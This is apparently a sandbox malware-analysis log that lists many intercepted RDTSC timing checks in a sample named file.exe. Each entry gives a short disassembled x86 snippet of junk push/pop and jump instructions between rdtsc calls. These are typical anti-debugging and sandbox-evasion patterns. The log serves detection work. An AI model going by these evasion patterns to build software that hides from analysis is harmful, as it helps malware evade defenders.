Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4A7E second address: ED4A88 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4224DD3FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4A88 second address: ED4A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4A8E second address: ED4A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED983E second address: ED9843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9843 second address: ED986E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D22B9h], ecx 0x00000011 push 00000000h 0x00000013 mov bh, ch 0x00000015 push 00000000h 0x00000017 mov bh, ch 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b ja 00007F4224DD3FDCh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED986E second address: ED9872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9872 second address: ED9876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDA7F3 second address: EDA824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, edx 0x0000000d push 00000000h 0x0000000f sub bx, A0FBh 0x00000014 push 00000000h 0x00000016 jmp 00007F4224E6F2ABh 0x0000001b xchg eax, esi 0x0000001c jl 00007F4224E6F2B4h 0x00000022 pushad 0x00000023 jns 00007F4224E6F2A6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED783F second address: ED785C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED68DD second address: ED68E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED99E6 second address: ED99F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4224DD3FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED785C second address: ED786D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F4224E6F2A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDA900 second address: EDA91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F4224DD3FDCh 0x0000000b jbe 00007F4224DD3FD6h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jo 00007F4224DD3FD6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBA0E second address: EDBA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED99F0 second address: ED99F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED786D second address: ED788C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4224E6F2B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDA91E second address: EDA923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED99F6 second address: ED99FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDAA01 second address: EDAA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jo 00007F4224DD3FD6h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDAA16 second address: EDAA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE3FB0 second address: EE3FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE3FB4 second address: EE3FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F4224E6F2A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE3FC4 second address: EE3FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE3FC8 second address: EE3FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE3FD4 second address: EE3FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE709D second address: EE70A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE70A5 second address: EE70D0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jmp 00007F4224DD3FE3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F4224DD3FF0h 0x00000015 jne 00007F4224DD3FE2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB85B second address: EEB85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB998 second address: EEB9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4224DD3FD6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB9AA second address: EEB9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 jmp 00007F4224E6F2B5h 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4224E6F2B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBA9B second address: EEBAB6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4224DD3FDCh 0x00000008 jnl 00007F4224DD3FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F4224DD3FD8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBAB6 second address: EEBAD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F4224E6F2A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBAD9 second address: EEBADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBADD second address: EEBAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBAE3 second address: EEBAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4224DD3FDAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBAF2 second address: EEBB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 ja 00007F4224E6F2AAh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jg 00007F4224E6F2A6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEBB15 second address: EEBB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E78862 second address: E78866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0485 second address: EF048B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0BA6 second address: EF0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0BAA second address: EF0BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4224DD3FDCh 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4224DD3FE3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0D03 second address: EF0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0D07 second address: EF0D0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0E8F second address: EF0E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0E93 second address: EF0E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0E9E second address: EF0EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4224E6F2A6h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0EB0 second address: EF0EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF113F second address: EF1143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1143 second address: EF1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1149 second address: EF114F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF114F second address: EF115C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jg 00007F4224DD3FD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF129A second address: EF129E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF129E second address: EF12AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F4224DD3FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF12AE second address: EF12B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1419 second address: EF141E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF56A6 second address: EF56AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8445A second address: E84469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F4224DD3FD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9AB2 second address: EF9ABB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9BF3 second address: EF9BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9BFC second address: EF9C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9C02 second address: EF9C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9D5A second address: EF9D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA01B second address: EFA01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA01F second address: EFA027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA027 second address: EFA032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA2C8 second address: EFA2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA2CE second address: EFA2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFA9DB second address: EFA9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4224E6F2A6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFADF4 second address: EFAE07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4224DD3FD8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFDF05 second address: EFDF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jc 00007F4224E6F2ACh 0x0000000d js 00007F4224E6F2A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFDF18 second address: EFDF1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFDF1D second address: EFDF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04384 second address: F04393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4224DD3FD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04393 second address: F043AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4224E6F2B3h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F043AF second address: F043B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F034A4 second address: F034C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F4224E6F2A6h 0x00000009 jg 00007F4224E6F2A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F4224E6F2A6h 0x0000001b jl 00007F4224E6F2A6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F03B6C second address: F03B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4224DD3FD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F03B7D second address: F03B83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08B7E second address: F08B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4224DD3FE3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F08B97 second address: F08B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7F4F second address: EC7F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4224DD3FE3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7F66 second address: EC7F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7F6A second address: EA89CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jmp 00007F4224DD3FE6h 0x0000000f pop ecx 0x00000010 nop 0x00000011 sub di, D3D1h 0x00000016 call dword ptr [ebp+122DB44Fh] 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F4224DD3FDAh 0x00000024 push edx 0x00000025 pop edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007F4224DD3FDFh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8308 second address: EC8317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4224E6F2A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8317 second address: EC832D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4224DD3FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F4224DD3FEFh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC832D second address: EC8331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC85F3 second address: EC85FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC85FF second address: EC8604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC86E4 second address: EC86E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC86E8 second address: EC86EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC87BB second address: EC87C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC88C6 second address: EC88CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC88CA second address: EC88CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC88CE second address: EC8914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007F4224E6F2ACh 0x0000000d nop 0x0000000e mov ecx, esi 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F4224E6F2A8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c nop 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4224E6F2ABh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8914 second address: EC8949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4224DD3FE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8CB7 second address: EC8CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC900E second address: EC9012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F07F3D second address: F07F47 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4224E6F2A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
